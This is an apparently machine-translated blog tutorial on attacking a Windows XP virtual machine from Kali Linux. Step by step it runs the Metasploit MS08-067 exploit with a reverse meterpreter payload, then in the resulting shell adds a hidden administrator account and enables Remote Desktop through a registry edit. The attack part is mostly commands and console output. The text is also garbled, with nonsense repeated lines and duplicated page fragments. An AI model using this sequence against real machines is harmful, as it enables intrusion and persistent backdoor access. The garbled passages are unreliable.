Since I am a peace-loving person (covering my mouth with laughter), I entered hacke by creating two systems, one Kali and one Windows XP, in the virtual machine to conduct the hacking experiment.

#### test tools Kaili Linux Baidu Encyclopedia its pre-installed many test tools, These include Nmap, Wireshark, John the Ripper, and Aircrack-ng.[2] Users can run Kali Linux from a hard disk, live CD, or Live USB. Metasploit is a free, downloadable framework that makes it easy to acquire, develop, and attack computer software vulnerabilities. It comes with a professional-grade vulnerability attack tool for hundreds of known software vulnerabilities.

Bridge mode Network connection Bridge mode Network connection Connects VMS to the network using network adapters on the host system

Network connection in NAT mode If NAT mode is used, VMS do not have their own IP addresses on the external network. A separate private network is set up on the host system.

Host-only network connection Host-only network connection You can create a network that is completely contained in a host.

IP (ipv4 in this case) Address class, network type.

The IP address consists of net-id and host-id. According to the bits of network numbers, IP addresses are divided into A,B,C,D, and E categories, of which A (0,127),B (128,191), and C (192,223).

3.0 Differences between bridge, NAT, and Host modes provided by VMWare VMS

Therefore, the virtual machine network in this test adopts the bridge mode, so the following bridge is mainly introduced. Bridged, VMWare’s virtual operating system works like a standalone host on a local network, with access to any machine in the network. In bridge mode, virtual systems need to be configured with IP addresses and subnet masks because they are independent host systems. A virtual system in bridging mode has a similar relationship to the host machine as two computers connected to the same Hub. In order for them to communicate with each other, you need to configure IP addresses and subnet masks for virtual systems, otherwise they cannot communicate. It also needs to be on the same network segment as the host machine so that the virtual system can communicate with the host machine.

lo: Flags =73<UP,LOOPBACK,RUNNING> MTU 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixLen 128 scopeid 0x10 loop Txqueuelen 1000 (Local Loopback) RX packets 52 bytes 3756 (3.6 KiB) RX errors 0 Dropped 0 Overruns 0 frame 0 TX packets 52 bytes 3756 (3.6 KiB) TX errors 0 Dropped 0 Overruns 0 carrier 0 collisions 0

>** Here you can see that my IP address is 192.168.201.133. To change the IP address, run the ifconfig eth0 192.168.201.136 command **<br> ** 127.0.0.1 127.0.0.1 loopback address (https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80), is refers to the local machine, are commonly used to test. The Loopback Address (127.x.x.x) is the local Loopback Address. The IP [stack] [host] (https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA) (https://baike.baidu.com/item/%E5%A0%86%E6%A0%88), the internal IP address, Software testing, as well as the local machine is mainly used for network interprocess communication (https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1), regardless of the program, once use loopback address to send data, The protocol software returns immediately without any network transfer. ** **2.0 ping command to test whether Linux and Windows can communicate **Copy the code

root@kali:~# ping -c 2 192.168.201.135 ping 192.168.201.135 (192.168.201.135) 56(84) bytes of data.64 bytes from 192.168.201.135: ICmp_seq =1 TTL =128 time=13.5 ms 64 bytes from 192.168.201.135: icmp_seq=2 TTL =128 time= 0.395ms

— 192.168.201.135 ping statistics — 3 packets transmitted, 2 received, 0% packet loss, Time 1002ms RTT min/avg/ Max /mdev = 0.395/6.986/13.578/6.592ms

** Linux pings are different from Windows pings. If you do not set the number of pings, the ping will continue.Copy the code

root@kali:~# ping Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 …] destination

**3.0 Starting the SQL database service **Copy the code

root@kali:~# service postgresql start

**4.0 Run the msfconsole command ** on the terminalCopy the code

root@kali:~# msfconsole

cowsay++

< metasploit >

\ \ (oo) __, _____ (__)) \ | | -- - | | * = [metasploit v4.16.6 - dev]Copy the code

— –=[ 1682 exploits – 964 auxiliary – 297 post ]
— –=[ 498 payloads – 40 encoders – 10 nops ]
— –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

> * *helpCommand to view its arguments and usageCopy the code

msf > help

Core Commands

Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect  Communicate with a host exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history irb Drop into irb scripting mode load Load a framework plugin quit Exit the console route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbersCopy the code

Module Commands

Command       Description
-------       -----------
advanced      Displays advanced options for one or more modules
back          Move back from the current context
edit          Edit the current module with the preferred editor
info          Displays information about one or more modules
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Selects a module by name
Copy the code

Job Commands

Command       Description
-------       -----------
handler       Start a payload handler as job
jobs          Displays and manages jobs
kill          Kill a job
rename_job    Rename a job
Copy the code

Resource Script Commands

Command       Description
-------       -----------
makerc        Save commands entered since start to a file
resource      Run the commands stored in a file
Copy the code

Database Backend Commands

Command Description ------- ----------- db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result  file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspacesCopy the code

Credentials Backend Commands

Command       Description
-------       -----------
creds         List all credentials in the database
Copy the code

**5.0 Run the search netapi command to search netAPI and list all netAPi-related exploit codes in the Metasploip framework **Copy the code

msf > search netapi

Matching Modules

Name Disclosure Date Rank Description

exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

>** You can see that the last exploit code is rated great, so ms08_067_netAPI is preferred. ** **show tagrgets you can view the attack platform ** **show opinions you can view what parameters the attack needs to set ** **show payloads you can view the attack payload used ** **6.0 use use Exploit/Windows/SMB/MS08_067_netapi, set parameter **Copy the code

msf > use exploit/windows/smb/ms08_067_netapi

MSF exploit(MS08_067_netapi) > set rhost 192.168.201.135 rhost => 192.168.201.135 MSF exploit(MS08_067_netapi) > check [+] 192.168.201.135:445 The target is vulnerable.msf exploit(MS08_067_netapi) > set lhost 192.168.201.133 lhost => 192.168.201.133 MSF exploit(MS08_067_netAPI) > set target 34 MSF exploit(MS08_067_netAPI) > set payload windows/meterpreter/reverse_tcp_allports payload => windows/meterpreter/reverse_tcp_allports

MSF exploit(MS08_067_netAPI) > exploit [] Started reverse TCP handler on 192.168.201.133:1 [] 192.168.201.135:445 – Attempting to trigger the vulnerability… [] Sending stage (179267 bytes) to 192.168.201.135 [] Meterpreter session 1 opened (192.168.201.133:1 -> At 2017-10-27 23:03:20 +0800

> * *setRhost: set the destination host IP address ** ** setSet lhost: set the local IP address ** **set** **7.0 enter shell to obtain controlled Shel of Zhuji. This is the DOS of Windows. **Copy the code

Meterpreter > Shell Process 1968 created. Channel 1 created 1985-2001 Microsoft Corp.

C: WINDOWS\system32>net user ZTG 123456 /add net user ZTG 123456 /add net user ZTG 123456 /add

HELPMSG 2224 hook hook hook hook hook hook hook hook hook hook hook hook hook hook hook hook

C:\WINDOWS\ System32 >net LocalGroup Administrators ZTG /add NET LocalGroup Administrators ZTG /add

Grab grab grab grab grab grab grab grab grab grab grab grab grab grab grab grab grab grab

C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

Charles, Charles, Charles, Charles, Charles

C:\WINDOWS\system32>netstat -an netstat -an

Active Connections

Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 192.168.201.135:1031 192.168.201.133:1 ESTABLISHED UDP 0.0.0.0:445: UDP 0.0.0.0:500: UDP 0.0.0.0:4500: UDP 127.0.0.1:123: UDP 127.0.0.1:1025: UDP 127.0.0.1:1900: UDP 192.168.201.135:123: UDP 192.168.201.135:137: UDP 127.0.0.1:123: UDP 127.0.0.1:1025: UDP 127.0.0.1:1900: UDP 192.168.201.135:123: UDP 192.168.201.135:137: UDP UDP 192.168.201.135:138: UDP 192.168.201.135:1900:

C:\WINDOWS\system32>ipconfig -all ipconfig -all

Windows IP Configuration

    Host Name . . . . . . . . . . . . : dflx
    Primary Dns Suffix  . . . . . . . : 
    Node Type . . . . . . . . . . . . : Unknown
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No
Copy the code

Ethernet Adapter kao kao

Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-0C-29-04-23-53 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.201.135 Subnet Mask........... : 255.255.255.0 Default Gateway......... :Copy the code

>** Enter the Windows interface, DOS can be smooth, but if you like the Windows interface, you can install the above method, to operate on the remote desktop. ** ```C:\WINDOWS\system32>net user ztg 123456 /add net user ztg 123456 /addCopy the code

Add a user named ZTG and password 123456

C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add
Copy the code

Add ZTG to the administrator user group

C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Copy the code

Yes Manually enable 3389 (Remote desktop connection port)

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Kali invasion of Windows

cowsay++

< metasploit >

Core Commands

Module Commands

Job Commands

Resource Script Commands

Database Backend Commands

Credentials Backend Commands

Matching Modules

Kali invasion of Windows

cowsay++

< metasploit >

Core Commands

Module Commands

Job Commands

Resource Script Commands

Database Backend Commands

Credentials Backend Commands

Matching Modules

Related Posts

Details the Java thread lifecycle

Learn how to use Puppeteer in function calculations in 3 minutes

Hardcore recommendation: OpenWrite, a free platform for multiple articles, without deployment, registration and use, safe and reliable!